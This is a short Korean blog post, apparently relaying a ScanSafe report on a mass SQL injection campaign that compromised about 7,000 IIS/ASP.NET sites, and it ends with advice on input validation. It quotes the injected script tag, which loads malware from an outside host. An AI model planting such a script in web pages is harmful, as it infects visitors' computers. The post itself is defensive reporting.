외국에 위치하고 있는 보안 기업인 ScanSafe는 자사의 블로그를 통해 대규모의 SQL 인젝션 공격이 발생했다는 사실을 밝혔습니다.

블로그에 따르면 이번 주 초부터 발생한 공격으로 월스트리트 저널, 예루살렘 포스트 등을 포함한 약 7천여개의 웹사이트가 침해되었습니다.

공격은 이미 널리 알려져 있는 SQL 인젝션 취약점을 이용한 것으로 취약점이 있는 서버의 데이터베이스에 아래의 스크립트를 삽입하는 방식으로 진행되었습니다

script src=http://ww.robint.us/u.js

이 스크립트는 악성 코드가 포함되어 있는 웹서버에서 PC로 악성 코드를 자동으로 다운로드하도록 하는 것으로 백신이나 보안 패치가 부족한 PC에서 특히 위험합니다.

한편 이번에 발생한 공격은 윈도우 서버 플랫폼 즉, IIS/ASP.NET 기반으로 개발된 웹사이트를 주 공격대상으로 삼고 있었습니다.

월스트리트 저널의 경우에는 adicio.com 이라는 제휴 회사의 침해로 인해 WSJ.com 홈페이지의 특정 페이지에 공격이 나타나는 현상이 발생했습니다.

공격받은 대부분의 웹사이트에서 악성 스크립트는 이미 제거된 상태이지만, 아직까지도 수천개 이상의 사이트들에서는 해결이 되지 않은 상태입니다.

SQL 인젝션 취약점은 소스 코드에서 입/출력되는 값이 적절한지 검증을 거치지 않아 발생하는 것입니다. 따라서, 소스 수준에서 문제점을 해결해야만 이와 같은 공격으로부터 자유로울 수 있습니다.

물론, WAF(웹 애플리케이션 파이워월)와 같은 보안 장비(소프트웨어)를 사용할 수 있지만, 새로운 유형의 공격 형태가 나타날 경우에는 또다시 문제가 될 소지가 많습니다. 따라서, 근본적으로 해결을 해야 합니다.

출처: http://blog.scansafe.com/

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus


    Web Analytics Blogs Directory